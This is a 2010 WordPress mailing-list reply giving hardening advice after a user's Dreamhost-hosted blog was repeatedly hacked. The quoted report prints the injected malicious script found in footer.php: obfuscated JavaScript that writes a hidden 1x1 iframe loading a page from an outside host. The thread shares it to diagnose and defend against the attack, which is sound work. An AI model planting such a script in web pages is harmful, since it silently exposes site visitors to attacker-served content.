[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Ozh ozh at ozh.org
Sun Oct 31 18:15:51 UTC 2010

Typically not a Dreamhost issue, otherwise there would be *thousands*
of people screaming, and me in first line

Being up to date with WP is fine, but most hack on shared hosting are
not done using WP
- check file permissions <http://codex.wordpress.org/Hardening_WordPress>
- check other softwares & scripts running on your blog
- change your main/SSH/FTP password
- change your WP password

I once had a WP blog hacked on Dreamhost. A few hours of investigation
later (checking all the above + inspecting access logs) I found out
that the insecure stuff was Scuttle (a delicious clone).

On shared hosting WP is often the target, but rarely the entrance.

On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
<mladen.adamovic at gmail.com> wrote:
> Hi guys,
> My wordpress software instance was repeatedly hacked ... running latest
> Wordpress source code and being hosted on Dreamhost.
> I don't know which exploit it did use and couldn't identify it, but it was
> adding the following code to my default theme footer.php:
> <script>
> enc =
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> dec = unescape(enc);
> document.write(dec);
> </script>
> I think I'll have to migrate to Blogger, since I couldn't identify exploit
> it did use.
> I wanted to drop you an email anyhow since identifying exploits is
> important!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers


More information about the wp-hackers mailing list